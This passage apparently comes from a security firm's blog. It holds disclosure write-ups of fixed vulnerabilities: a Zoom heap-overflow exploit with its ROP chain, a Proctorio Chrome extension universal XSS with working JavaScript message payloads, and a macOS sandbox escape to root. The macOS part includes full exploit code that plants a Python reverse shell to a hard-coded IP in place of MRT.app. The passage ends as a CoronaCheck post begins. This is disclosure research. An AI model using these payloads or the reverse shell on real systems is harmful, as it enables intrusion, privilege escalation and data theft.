      <arg>John Doe</arg>
    </args>
  </sns>
  <zmext>
    <msg_type>12</msg_type>
    <from n="John Doe" res="ZoomChat_pc"/>
    <to/>
    <visible>true</visible>
    <msg_feature>16384</msg_feature>
  </zmext>
  <giphyv2 id="YQitE4YNQNahy" url="https://giphy.com/gifs/YQitE4YNQNahy" tags="hacker">
    <pcInfo url="https://file.zoom.us/external/link/issue?id=1::HYlQuJmVbpLCRH1UrxGcLA::aatxNv43wlLYPmeAHSEJ4w::7ZOfQeOxWkdqbfz-Dx-zzununK0e5u80ifybTdCJ-Bdy5aXUiEOV0ZF17hCeWW4SnOllKIrSHUpiq7AlMGTGJsJRHTOC9ikJ3P0TlU1DX-u7TZG3oLIT8BZgzYvfQS-UzYCwm3caA8UUheUluoEEwKArApaBQ3BC4bEE6NpvoDqrX1qX" size="1456787"/>
    <mobileInfo url="https://file.zoom.us/external/link/issue?id=1::0ZmI3n09cbxxQtPKqWbv1g::AmSzU9Wrsp617D6cX05tMg::_Q5mp2qCa4PVFX8gNWtCmByNUliio7JGEpk7caC9Pfi2T66v2D3Jfy7YNrV_OyIRgdT5KJdffuZsHfYxc86O7bPgKROWPxfiyOHHwjVxkw80ivlkM0kTSItmJfd2bsdryYDnEIGrk-6WQUBxBOIpyMVJ2itJ-wc6tmOJBUo9-oCHHdi43Dk" size="549356"/>
    <bigPicInfo url="https://file.zoom.us/external/link/issue/../../../file/[file_id]" size="4322534"/>
  </giphyv2>
</message>

Our plan was to create a 25 MB GIF file and allocate it multiple times to create a specific address where the data we needed would be placed. Large allocations of this size are randomized when ASLR is used, but these allocations are still page aligned. Because the data we wanted to place was much less than one page, we could just create one page of data and repeat that. This page started with a minimal GIF file, which was enough for the entire file to be considered a valid GIF file. Because Zoom is a 32-bit application, the possible address space is very small. If enough copies of the GIF file are loaded in memory (say, around 512 MB), then we can quite reliably “guess” that a specific address falls inside a GIF file. Due to the page-alignment of these large allocations, we can then use offsets from the page boundary to locate the data we want to refer to.

Step 13: Pivot into ROP

Now we have all the ingredients to call an address in libcrypto-1_1.dll. But to gain arbitrary code execution, we would (probably) need to call multiple functions. For stack buffer overflows in modern software this is commonly achieved using return-oriented programming (ROP). By placing return addresses on the stack to call functions or perform specific register operations, multiple functions can be called sequentially with control over the arguments.

We had a heap buffer overflow, so we could not do anything with the stack just yet. The way we did this is known as a stack pivot: we replaced the address of the stack pointer to point to data we control. We found the following sequence of instructions in libcrypto-1_1.dll:

push edi; # points to vtable pointer (memory we control)
pop esp;  # now the stack pointer points to memory under our control
pop edi;  # pop some extra registers
pop esi; 
pop ebx; 
pop ebp; 
ret

This sequence is misaligned and normally does something else, but for us this could be used to copy an address to data we overwrote (in edi) to the stack pointer. This means that we have replaced the stack with data we wrote with the buffer overflow.

From our ROP chain we wanted to call VirtualProtect to enable the execute bit for our shellcode. However, libcrypto-1_1.dll does not import VirtualProtect, so we don’t have the address for this yet. Raw system calls from 32-bit Windows applications are, apparently, difficult. Therefore, we used the following ROP chain:

  1. Call GetModuleHandleW to get the base address of kernel32.dll.
  2. Call GetProcAddress to get the address of VirtualProtect from kernel32.dll.
  3. Call that address to make the GIF data executable.
  4. Jump to the shellcode offset in the GIF.

In the following animation, you can see how we overwrite the vtable, and then when Close is called the stack is pivoted to our buffer overflow. Due to the extra pop instructions in the stack pivot gadget, some unused values are popped. Then, the ROP chain stats by calling GetModuleHandleW with as argument the string "kernel32.dll" from our GIF file. Finally, when returning from that function a gadget is called that places the result value into ebx. The calling convention in use here means the argument is passed via the stack, before the return address.

In our exploit this results in the following ROP stack (crypto_base points to the load address of libcrypto-1_1.dll we leaked earlier):

# push edi; pop esp; pop edi; pop esi; pop ebx; pop ebp; ret
STACK_PIVOT = crypto_base + 0x441e9

GIF_BASE = 0x462bc020
VTABLE = GIF_BASE + 0x1c # Start of the correct vtable
SHELLCODE = GIF_BASE + 0x7fd # Location of our shellcode
KERNEL32_STR = GIF_BASE + 0x6c  # Location of UTF-16 Kernel32.dll string
VIRTUALPROTECT_STR = GIF_BASE + 0x86 # Location of VirtualProtect string

KNOWN_MAPPED = 0x2fe451e4

JMP_GETMODULEHANDLEW = crypto_base + 0x1c5c36 # jmp GetModuleHandleW
JMP_GETPROCADDRESS = crypto_base + 0x1c5c3c # jmp GetProcAddress

RET = crypto_base + 0xdc28 # ret
POP_RET = crypto_base + 0xdc27 # pop ebp; ret
ADD_ESP_24 = crypto_base + 0x6c42e # add esp, 0x18; ret

PUSH_EAX_STACK = crypto_base + 0xdbaa9 # mov dword ptr [esp + 0x1c], eax; call ebx
POP_EBX = crypto_base + 0x16cfc # pop ebx; ret
JMP_EAX = crypto_base + 0x23370 # jmp eax

rop_stack = [
VTABLE,     # pop edi
GIF_BASE + 0x101f4, # pop esi
GIF_BASE + 0x101f4, # pop ebx
KNOWN_MAPPED + 0x20, # pop ebp
JMP_GETMODULEHANDLEW,
POP_EBX,
KERNEL32_STR,

ADD_ESP_24,
PUSH_EAX_STACK,
0x41414141,
POP_RET, # Not used, padding for other objects
0x41414141,
0x41414141,
0x41414141,
JMP_GETPROCADDRESS,
JMP_EAX,
KNOWN_MAPPED + 0x10, # This will be overwritten with the base address of Kernel32.dll
VIRTUALPROTECT_STR,
SHELLCODE,
SHELLCODE & 0xfffff000,
0x1000,
0x40,
SHELLCODE - 8,
]

And that’s it! We now had a reverse shell and could launch calc.exe.

Reliability, reliability, reliability

The last week before the contest was focused on getting it to an acceptable reliability level. As we mentioned in the info leak, this phase was very tricky. It took a lot of time to get it to having even a tiny chance to succeed. We had to overwrite a lot of data here, but the application had to remain stable enough that we could still perform the second phase without crashing.

There were a lot of things we did to improve the reliability and many more we tried and gave up. These can be summarized in two categories: decreasing the chance that we overwrote something we shouldn’t and decreasing the chance that the client would crash when we had overwritten something we didn’t intend to.

In the second phase, it could happen that we overwrote the vtable of a different object. Whenever we had a crash like this, we would try to fix it by placing a compatible no-op function on the corresponding place in the vtable. This is harder than it sounds on 32-bit Windows, because there are multiple calling conventions involved and some require the RET instruction to pop the arguments from the stack, which means that we needed a no-op that pops the right number of values.

In the first phase, we also had a chance of overwriting pointers in objects in the same size range. We could not yet deal with function pointers or vtables as we had no info leak, but we could place pointers to readable/writable memory. We started our exploit by uploading some GIF files to create known addresses with controlled data before this phase so we could use those addresses in the data we used for the overflow. Of course, the data in the GIF files could again be dereferenced as a pointer, requiring multiple layers of fake addresses.

What may not yet be clear is that each attempt required a slow manual process. Each time we wanted to run our exploit, we would launch the client, clear all chat messages for the victim, exit the client and launch it again. Because the memory layout was so important, we had to make sure we started from an identical state each time. We had not automated this, because we were paranoid about ensuring the client would be used in exactly the same way as during the contest. Anything we did differently could influence the heap layout. For example, we noticed that adding network interception could have some effect on how network requests were allocated, changing the heap layout. Our attempts were often close to 5 minutes, so even just doing 10 attempts took an hour. To assess if a change improved the reliability, 10 runs was pretty low.

Both the info leak and the vtable overwrite phase run in loops. If we were lucky, we had success in the first iteration of the loop, but it could go on for a long time. To improve our chance of success in the time limit, our exploit would slowly increase the risk it took the more iterations it needed. In the first iteration we would only overflow a small number of times and only one object, but this would increase to more and more overflows with larger sizes the longer it took.

In the second phase we could take more risks. The application did not need to remain stable enough for another phase and we only needed two adjacent allocations, not also a third unallocated block. By overwriting 10 blocks further, we had a very good chance of hitting the needed object with just one or two iterations.

In the end, we estimated that our exploit had about a 50% chance of success in the 5 minutes. If, on the other hand, we could leak the address of libcrypto-1_1.ddl in one run and then skip the info leak in the next run (the locations of ASLR randomized dlls remain the same on Windows for some time), we could increase our reliability to around 75%. ZDI informed us during the contest that this would result in a partial win, but it never got to the point where we could do that. The first attempt failed in the first phase.

Conclusion

After we handed in our final exploit the nerve-wracking process of waiting started. Since we needed to hand in our final exploit two days before the event and the organizers would not run our exploit until our attempt, it was out of our hands. Even during the attempts we could not see the attacker’s screen, for example, so we had no idea if everything worked as planned. The enormous relief when calc.exe popped up made it worth it in the end.

In total we spend around 1.5 weeks from the start of our research until we had the main vulnerability of our exploit. Writing and testing the exploit itself took another 1.5 months, including the time we needed to read up on all Windows internals we needed for our exploit.

We would like to thank ZDI and Zoom for organizing this year’s event, and hopefully see you guys next year!

Proctorio Chrome extension Universal Cross-Site Scripting

14 December 2021 at 00:00

The switch to online exams

In February of 2020 the first person in The Netherlands tested positive for COVID-19, which quickly led to a national lockdown. After that universities had to close for physical lectures. This meant that universities quickly had to switch to both online lectures and tests.

For universities this posed a problem: how are you going to prevent students from cheating if they take the test in a location where you have no control nor visibility? In The Netherlands most universities quickly adopted anti-cheating software that students were required to install in order to be able to take a test. This to the dissatisfaction of students, who found this software to be too invasive of their privacy. Students were required to run monitoring software on their personal device that would monitor their behaviour via the webcam and screen recording.

The usage of this software was covered by national media on a regular basis, as students fought to disallow universities to use this kind of software. This led to several court cases were universities had to defend the usage of this software. The judge ended up ruling in favour of the universities.

Proctorio is such monitoring software and it is used by most Dutch universities. For students this comes as a Google Chrome extension. And indeed, the extension has quite an extensive list of permissions. This includes the recording of your screen and permission to read and change all data on the websites that you visit.

All this was reason enough for us to have a closer look to this much debated software. After all, vulnerabilities in this extension could have considerable privacy implications for students with this extension installed. In the end, we found a severe vulnerability that leads to a Universal Cross-Site Scripting vulnerability, which could be triggered by any website. This means that a malicious website visited by the user could steal or modify any data from every website, if the victim had the Proctorio extension installed. The vulnerability has since been fixed by Proctorio. As Chrome extensions are updated automatically, this requires no actions from Proctorio users.

Background

Chrome extensions consist of two parts. A background page with JavaScript is the core of the extension, which has the permissions granted to the extension. It can add scripts to currently open tabs, which are known as content scripts. Content scripts have access to the DOM, but use a separate JavaScript environment. Content scripts do not have the full permissions of the background page, but their ability to communicate with the background page makes them more powerful than the JavaScript on a page itself.

Vulnerability details

The Proctorio extension inspects network traffic of the browser. When requests are observed for paths that match supported test taking websites, it injects some content scripts into the page. It tries to determine if the user is using a Proctorio-enabled test by retrieving details of the test using specific API endpoints used by the supported test websites.

Once a test is started, a toolbar is added with a number of buttons allowing a student to manage Proctorio. This includes a button to open a calculator, which supports some simple mathematical calculations.

Proctorio Calculator

When the user clicks the ‘=’ button, a function is called in the content script to compute the result. The computation is performed by calling the eval() function in JavaScript, in the minified JavaScript this is in the function named ghij. The function eval() is a dangerous, as it can execute arbitrary JavaScript, not just mathematical expressions. The function ghij does not check that the input is actually a mathematical expression.

Because the calculator is added to DOM of the page activating Proctorio, JavaScript on the page can automatically enter an expression for the calculator and then trigger the evaluation. This allows the webpage to execute code inside the content script. From the context of the content script, the page can then send messages to the background page that are handled as messages from the content script. Using a combination of messages, we found we could trigger UXSS.

(In our Zoom exploit, the calculator was opened just to demonstrate our ability to launch arbitrary applications, but in this case we actually exploit the calculator itself!)

Exploitation to UXSS

By using one of a number of specific paths in the URL, adding certain DOM elements and sending specific responses to a small number of API requests Proctorio can be activated by any website without user approval. By pretending to be in demo mode and automatically activating the demo, the page can start a complete Proctorio session. This happens completely automatically, without user interaction. Then, the page can open the calculator and use the exploit to execute code in the content script.

The content script itself does not have the full permissions of the browser extension, but it does have permission to send messages to the background page. The JavaScript on the background page supports a large number of different messages, each identified by a number indicated by the first element of the array which is the message.

The first thing that can be done using that is to download a URL while bypassing the Same Origin Policy. There are a number of different message types that will download a URL and return the result. For example, message number 502:

chrome.runtime.sendMessage([502, '1', '2', 'https://www.google.com/#'], alert);

(The # is used here to make sure anything which is appended after it is not sent to the server.)

This downloads the URL in the session of the current user and returns the result to the page. This could be used to, for example, retrieve all of the user’s email messages if they are signed in to their webmail if it uses cookies for authentication. Normally, this is not allowed unless the URL uses the same origin, or the response specifically allows it using Cross-Origin Resource Sharing (CORS).

A CORS bypass is already a serious vulnerability, but it can be extended further. A universal cross-site scripting attack can be performed in the following way.

Some messages trigger the adding of new content scripts to the tab. Sometimes, variables need to be passed to those scripts. Most of the time those variables are escaped correctly, but when using a message with number 25, the argument is not escaped. The minified code for this function is:

if (25 == a[0]) return chrome.tabs.executeScript(b.tab.id, {
    code: c0693(a[1])
}, function() {}), c({}), !0;

which calls:

function c0693(a) {
    return "(" + function(a) {
        var b = document.getElementsByTagName("body");
        if (b.length) b[0].innerHTML = a; else {
            b = document.getElementsByTagName("html")[0];
            var c = document.createElement("body");
            c.innerHTML = a;
            b.appendChild(c);
        }
    } + ")(" + a + ");";
}

This function c0693() contains a function which is converted to a string. This inner function not executed by the background page, but by converting it to a string it takes the text of this function, which is then called using the argument a in the content script. Note that the last line in this function does not escape that value. This means that it is possible to include JavaScript, which is then executed in the context of the content script in the same tab that sent the message.

Evaluating JavaScript in the same tab again is not very useful on its own, but it is possible to make the tab switch origins in between sending the message and the execution of the new script. This is because the call to executeScript specifies the tab id, which doesn’t change when navigating to a different page.

Message with number 507 uses a synchronous XMLHttpRequest, which means that the JavaScript of the entire background page will be blocked while waiting for the HTTP response. By sending a request to a URL which is set up to always take 5 seconds to respond, then immediately sending a message with number 25 and then changing the location of the tab, the JavaScript from the 25 message is executed on a new page instead.

For example, the following will allow the https://computest.nl origin to execute an alert on the https://example.com origin:

chrome.runtime.sendMessage([507, '1', '2', 'https://computest.nl/sleep#']);

chrome.runtime.sendMessage([25, 'alert(document.domain)']);

document.location = 'https://example.com';

The URL https://computest.nl/sleep is used here as an example of a URL that takes 5 seconds to respond.

The video below demonstrates the attack:

Finally, the user could notice the fact that Proctorio is enabled based on the color of the Proctorio icon in the browser bar, which turns green once it activates. However, sending a message [32, false] turns this icon grey again, even though Proctorio is still active. The malicious webpage could quickly turn the icon grey again after exploiting the content script, which means the user only has a few milliseconds to notice the attack.

What can we do with UXSS?

An important security mechanism of your browser is called the Same Origin Policy (SOP). Without SOP surfing the web would be very insecure, as websites would then be able to read data from other domains (origins). It is the most important security control the browser has to enforce.

With an Universal XSS vulnerability a malicious webpage can run JavaScript on other pages, regardless of the origin. This makes this a very powerful primitive for an attacker to have in a browser. The video below shows that we can use this primitive to obtain a screenshot from the webcam and to download a GMail inbox, using our exploit from above.

For stealing GMail data we just need to inject some JavaScript that copies the content of the inbox and sends it to a server under our control. For getting a webcam screenshot we rely on the fact that most people will have allowed certain legitimate domains to have webcam access. In particular, users of Proctorio who had to enable their webcam for a test will have given the legitimate test website permission to use the webcam. We use UXSS to open a tab of such a domain and inject some JavaScript that grabs a webcam screenshot. In the example we rely on the fact that the victim has previously granted the domain zoom.us webcam access. This can be any page, but due to the pandemic we think that zoom.us would be a pretty safe bet. (The stuffed animal is called Dikkie Dik, from a well known Dutch children’s picture book.)

Disclosure

We contacted Proctorio with our findings on June 18th, 2021. They replied back within hours thanking us for our findings. Within a week (on June 25th) they reported that the vulnerability was fixed and a new version was pushed to the Google Chrome Web Store. We verified that the vulnerability was fixed on August 3rd. Since Google Chrome automatically updates installed extensions, this requires no further action from the end-user. At the time of writing version 1.4.21183.1 is the latest version.

In the fixed version, an iframe is used to load a webpage for the calculator, meaning exploiting this vulnerability is no longer possible.

Installing software on your (personal) device, either for work or for study always adds new risks end-users should be aware of. In general it is always wise to deinstall software as soon as you no longer need it, in order to mitigate this risk. In this situation one could disable the Proctorio plugin, to avoid it being accessible when you are not taking a test.

Sandbox escape + privilege escalation in StorePrivilegedTaskService

21 December 2021 at 00:00

CVE-2021-30688 is a vulnerability which was fixed in macOS 11.4 that allowed a malicious application to escape the Mac Application Sandbox and to escalate its privileges to root. This vulnerability required a strange exploitation path due to the sandbox profile of the affected service.

Background

At rC3 in 2020 and HITB Amsterdam 2021 Daan Keuper and Thijs Alkemade gave a talk on macOS local security. One of the subjects of this talk was the use of privileged helper tools and the vulnerabilities commonly found in them. To summarize, many applications install a privileged helper tool in order to install updates for the application. This allows normal (non-admin) users to install updates, which is normally not allowed due to the permissions on /Applications. A privileged helper tool is a service which runs as root which used for only a specific task that needs root privileges. In this case, this could be installing a package file.

Many applications that use such a tool contain two vulnerabilities that in combination lead to privilege escalation:

  1. Not verifying if a request to install a package comes from the main application.
  2. Not correctly verifying the authenticity of an update package.

As it turns out, the first issue not only affects third-party developers, but even Apple itself! Although in a slightly different way…

About StorePrivilegedTaskService

StorePrivilegedTaskService is a tool used by the Mac App Store to perform certain privileged operations, such as removing the quarantine flag of downloaded files, moving files and adding App Store receipts. It is an XPC service embedded in the AppStoreDaemon.framework private framework.

To explain this vulnerability, it would be best to first explain XPC services and Mach services, and the difference between those two.

First of all, XPC is an inter-process communication technology developed by Apple which is used extensively to communicate between different processes in all of Apple’s operating systems. In iOS, XPC is a private API, usable only indirectly by APIs that need to communicate with other processes. On macOS, developers can use it directly. One of the main benefits of XPC is that it sends structured data, supporting many data types such as integers, strings, dictionaries and arrays. This can in many cases avoid the use of serialization functions, which reduces the possibility of vulnerabilities due to parser bugs.

XPC services

An XPC service is a lightweight process related to another application. These are launched automatically when an application initiates an XPC connection and terminated after they are no longer used. Communication with the main process happens (of course) over XPC. The main benefit of using XPC services is the ability to separate dangerous operations or privileges, because the XPC service can have different entitlements.

For example, suppose an application needs network functionality for only one feature: to download a fixed URL. This means that when sandboxing the application, it would need full network client access (i.e. the com.apple.security.network.client entitlement). A vulnerability in this application can then also use the network access to send out arbitrary network traffic. If the functionality for performing the request would be moved to a different XPC service, then only this service would need the network permission. Compromising the main application would only allow it to retrieve that URL and compromising the XPC service would be unlikely, as it requires very little code. This pattern is how Apple uses these services throughout the system.

These services can have one of 3 possible service types:

  • Application: each application initiating a connection to an XPC service spawns a new process (though multiple connections from one application are still handled in the same process).
  • User: per user only one instance of an XPC service is running, handling requests from all applications running as that user.
  • System: only one instance of the XPC service is running and it runs as root. Only available for Apple’s own XPC services.

Mach services

While XPC services are local to an application, Mach services are accessible for XPC connections system wide by registering a name. A common way to register this name is through a launch agent or launch daemon config file. This can launch the process on demand, but the process is not terminated automatically when no longer in use, like XPC services are.

For example, some of the mach services of lsd:

/System/Library/LaunchDaemons/com.apple.lsd.plist:

<key>MachServices</key>
	<dict>
		<key>com.apple.lsd.advertisingidentifiers</key>
		<true/>
		<key>com.apple.lsd.diagnostics</key>
		<true/>
		<key>com.apple.lsd.dissemination</key>
		<true/>
		<key>com.apple.lsd.mapdb</key>
		<true/>
	...

Connecting to an XPC service using the NSXPCConnection API:

[[NSXPCConnection alloc] initWithServiceName:serviceName];

while connecting to a mach service:

[[NSXPCConnection alloc] initWithMachServiceName:name options:options];

NSXPCConnection is a higher-level Objective-C API for XPC connections. When using it, an object with a list of methods can be made available to the other end of the connection. The connecting client can call these methods just like it would call any normal Objective-C methods. All serialization of objects as arguments is handled automatically.

Permissions

XPC services in third-party applications rarely have interesting permissions to steal compared to a non-sandboxed application. Sanboxed services can have entitlements that create sandbox exceptions, for example to allow the service to access the network. Compared to a non-sandboxed application, these entitlements are not interesting to steal because the app is not sandboxed. TCC permissions are also usually set for the main application, not its XPC services (as that would generate rather confusing prompts for the end user).

A non-sandboxed application can therefore almost never gain anything by connecting to the XPC service of another application. The template for creating a new XPC service in Xcode does not even include a check on which application has connected!

This does, however, appear to give developers a false sense of security because they often do not add a permission check to Mach services either. This leads to the privileged helper tool vulnerabilities discussed in our talk. For Mach services running as root, a check on which application has connected is very important. Otherwise, any application could connect to the Mach service to request it to perform its operations.

StorePrivilegedTaskService vulnerability

Sandbox escape

The main vulnerability in the StorePrivilegedTaskService XPC service was that it did not check the application initiating the connection. This service has a service type of System, so it would launch as root.

This vulnerability was exploitable due to defense-in-depth measures which were ineffective:

  • StorePrivilegedTaskService is sandboxed, but its custom sandboxing profile is not restrictive enough.
  • For some operations, the service checked the paths passed as arguments to ensure they are a subdirectory of a specific directory. These checks could be bypassed using path traversal.

This XPC service is embedded in a framework. This means that even a sandboxed application could connect to the XPC service, by loading the framework and then connecting to the service.

[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];

The XPC service offers a number of interesting methods that can be called from the application using an NSXPCConnection. For example:

// Write a file
- (void)writeAssetPackMetadata:(NSData *)metadata toURL:(NSURL *)url withReplyHandler:(void (^)(NSError *))replyHandler;
 // Delete an item
- (void)removePlaceholderAtPath:(NSString *)path withReplyHandler:(void (^)(NSError *))replyHandler;
// Change extended attributes for a path
- (void)setExtendedAttributeAtPath:(NSString *)path name:(NSString *)name value:(NSData *)value withReplyHandler:(void (^)(NSError *))replyHandler;
// Move an item
- (void)moveAssetPackAtPath:(NSString *)path toPath:(NSString *)toPath withReplyHandler:(void (^)(NSError *))replyHandler;

A sandbox escape was quite clear: write a new application bundle, use the method -setExtendedAttributeAtPath:name:value:withReplyHandler: to remove its quarantine flag and then launch it. However, this also needs to take into account the sandbox profile of the XPC service.

The service has a custom profile. The restriction related to files and folders are:

(allow file-read* file-write*
    (require-all
        (vnode-type DIRECTORY)
        (require-any
            (literal "/Library/Application Support/App Store")
            (regex #"\.app(download)?(/Contents)?")
            (regex #"\.app(download)?/Contents/_MASReceipt(\.sb-[a-zA-Z0-9-]+)?")))
    (require-all
        (vnode-type REGULAR-FILE)
        (require-any
            (literal "/Library/Application Support/App Store/adoption.plist")
            (literal "/Library/Preferences/com.apple.commerce.plist")
            (regex #"\.appdownload/Contents/placeholderinfo")
            (regex #"\.appdownload/Icon")
            (regex #"\.app(download)?/Contents/_MASReceipt((\.sb-[a-zA-Z0-9-]+)?/receipt(\.saved)?)"))) ;covers temporary files the receipt may be named

    (subpath "/System/Library/Caches/com.apple.appstored")
    (subpath "/System/Library/Caches/OnDemandResources")
)

The intent of these rules is that this service can modify specific files in applications currently downloading from the app store, so with a .appdownload extension. For example, adding a MASReceipt file and changing the icon.

The regexes here are the most interesting, mainly because they are attached neither on the left nor right. On the left this makes sense, as the full path could be unknown, but the lack of binding it on the right (with $) is a mistake for the file regexes.

Formulated simply, we can do the following with this sandboxing profile:

  • All operations are allowed on directories containing .app anywhere in their path.
  • All operations are allowed on files containing .appdownload/Icon anywhere in their path.

By creating a specific directory structure in the temporary files directory of our sandboxed application:

bar.appdownload/Icon/

Both the sandboxed application and the StorePrivilegedTaskService have full access inside the Icon folder. Therefore, it would be possible to create a new application here and then use -setExtendedAttributeAtPath:name:value:withReplyHandler: on the executable to dequarantine it.

Privesc

This was already a nice vulnerability, but we were convinced we could escalate privileges to root as well. Having a process running as root creating new files in chosen directories with specific contents is such a powerful primitive that privilege escalation should be possible. However, the sandbox requirements on the paths made this difficult.

Creating a new launch daemon or cron jobs are common ways for privilege escalation by file creation, but the sandbox profile path requirements would only allow a subdirectory of a subdirectory of the directories for these config files, so this did not work.

An option that would work would be to modify an application. In particular, we found that Microsoft Teams would work. Teams is one of the applications that installs a launch daemon for installing updates. However, instead of copying a binary to /Library/PrivilegedHelperTools, the daemon points into the application bundle itself:

/Library/LaunchDaemons/com.microsoft.teams.TeamsUpdaterDaemon.plist

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>Label</key>
	<string>com.microsoft.teams.TeamsUpdaterDaemon</string>
	<key>MachServices</key>
	<dict>
		<key>com.microsoft.teams.TeamsUpdaterDaemon</key>
		<true/>
	</dict>
	<key>Program</key>
	<string>/Applications/Microsoft Teams.app/Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon</string>
</dict>
</plist>

The following would work for privilege escalation:

  1. Ask StorePrivilegedTaskService to move /Applications/Microsoft Teams.app somewhere else. Allowed, because the path of the directory contains .app.1
  2. Move a new app bundle to /Applications/Microsoft Teams.app, which contains a malicious executable file at Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon.
  3. Connect to the com.microsoft.teams.TeamsUpdaterDaemon Mach service.

However, a privilege escalation requiring a specific third-party application to be installed is not as convincing as a privilege escalation without this requirement, so we kept looking. The requirements are somewhat contradictory: typically anything bundled into an .app bundle runs as a normal user, not as root. In addition, the Signed System Volume on macOS Big Sur means changing any of the built-in applications is also impossible.

By an impressive and ironic coincidence, there is an application which is installed on a new macOS installation, not on the SSV and which runs automatically as root: MRT.app, the “Malware Removal Tool”. Apple has implemented a number of anti-malware mechanisms in macOS. These are all updateable without performing a full system upgrade because they might be needed quickly. This means in particular that MRT.app is not on the SSV. Most malware is removed by signature or hash checks for malicious content, MRT is the more heavy-handed solution when Apple needs to add code for performing the removal.

Although MRT.app is in an app bundle, it is not in fact a real application. At boot, MRT is run as root to check if any malware needs removing.

Our complete attack follows the following steps, from sandboxed application to code execution as root:

  1. Create a new application bundle bar.appdownload/Icon/foo.app in the temporary directory of our sandboxed application containing a malicious executable.
  2. Load the AppStoreDaemon.framework framework and connect to the StorePrivilegedTaskService XPC service.
  3. Ask StorePrivilegedTaskService to change the quarantine attribute for the executable file to allow it to launch without a prompt.
  4. Ask StorePrivilegedTaskService to move /Library/Apple/System/Library/CoreServices/MRT.app to a different location.
  5. Ask StorePrivilegedTaskService to move bar.appdownload/Icon/foo.app from the temporary directory to /Library/Apple/System/Library/CoreServices/MRT.app.
  6. Wait for a reboot.

See the full function here:

/// The bar.appdownload/Icon part in the path is needed to create files where both the sandbox profile of StorePrivilegedTaskService and the Mac AppStore sandbox of this process allow acccess.
NSString *path = [NSTemporaryDirectory() stringByAppendingPathComponent:@"bar.appdownload/Icon/foo.app"];
NSFileManager *fm = [NSFileManager defaultManager];
NSError *error = nil;

/// Cleanup, if needed.
[fm removeItemAtPath:path error:nil];

[fm createDirectoryAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS"] withIntermediateDirectories:TRUE attributes:nil error:&error];

assert(!error);

/// Create the payload. This example uses a Python reverse shell to 192.168.1.28:1337.
[@"#!/usr/bin/env python\n\nimport socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"192.168.1.28\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call([\"/bin/sh\",\"-i\"]);" writeToFile:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] atomically:TRUE encoding:NSUTF8StringEncoding error:&error];

assert(!error);

/// Make the payload executable
[fm setAttributes:@{NSFilePosixPermissions: [NSNumber numberWithShort:0777]} ofItemAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] error:&error];

assert(!error);

/// Load the framework, so the XPC service can be resolved.
[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@"com.apple.AppStoreDaemon.StorePrivilegedTaskService"];
conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(StorePrivilegedTaskInterface)];
[conn resume];

/// The new file is now quarantined, because this process created it. Change the quarantine flag to something which is allowed to run.
/// Another option would have been to use the `-writeAssetPackMetadata:toURL:replyHandler` method to create an unquarantined file.
[conn.remoteObjectProxy setExtendedAttributeAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] name:@"com.apple.quarantine" value:[@"00C3;60018532;Safari;" dataUsingEncoding:NSUTF8StringEncoding] withReplyHandler:^(NSError *result) {
    NSLog(@"%@", result);

    assert(result == nil);

    srand((unsigned int)time(NULL));

    /// Deleting this directory is not allowed by the sandbox profile of StorePrivilegedTaskService: it can't modify the files inside it.
    /// However, to move a directory, the permissions on the contents do not matter.
    /// It is moved to a randomly named directory, because the service refuses if it already exists.
    [conn.remoteObjectProxy moveAssetPackAtPath:@"/Library/Apple/System/Library/CoreServices/MRT.app/" toPath:[NSString stringWithFormat:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT%d.app/", rand()]
                               withReplyHandler:^(NSError *result) {
        NSLog(@"Result: %@", result);

        assert(result == nil);

        /// Move the malicious directory in place of MRT.app.
        [conn.remoteObjectProxy moveAssetPackAtPath:path toPath:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/MRT.app/" withReplyHandler:^(NSError *result) {
            NSLog(@"Result: %@", result);

            /// At launch, /Library/Apple/System/Library/CoreServices/MRT.app/Contents/MacOS/MRT -d is started. So now time to wait for that...
        }];
    }];
}];

Fix

Apple has pushed out a fix in the macOS 11.4 release. They implemented all 3 of the recommended changes:

  1. Check the entitlements of the process initiating the connection to StorePrivilegedTaskService.
  2. Tightened the sandboxing profile of StorePrivilegedTaskService.
  3. The path traversal vulnerabilities for the subdirectory check were fixed.

This means that the vulnerability is not just fixed, but reintroducing it later is unlikely to be exploitable again due to the improved sandboxing profile and path checks. We reported this vulnerability to Apple on January 19th, 2021 and a fix was released on May 24th, 2021.


  1. This is actually a quite interesting aspect of the macOS sandbox: to delete a directory, the process needs to have file-write-unlink permission on all of the contents, as each file in it must be deleted. To move a directory somewhere else, only permissions on the directory itself and its destination are needed! ↩︎

CoronaCheck App TLS certificate vulnerabilities

3 February 2022 at 00:00

During the pandemic a lot of software has seen an explosive growth of active users, such as the software used for working from home. In addition, completely new applications have been developed to track and handle the pandemic, like those for Bluetooth-based contact tracing. These projects have been a focus of our research recently. With projects growing this quickly or with a quick deadline for release, security is often not given the required attention. It is therefore very useful to contribute some research time to improve the security of the applications all of us suddenly depend on. Previously, we have found vulnerabilities in Zoom and Proctorio. This blog post will detail some vulnerabilities in the Dutch CoronaCheck app we found and reported. These vulnerabilities are related to the security of the connections used by the app and were difficult to exploit in practice. However, it is a little worrying to find this many vulnerabilities in an app for which security is of such critical importance.

Background

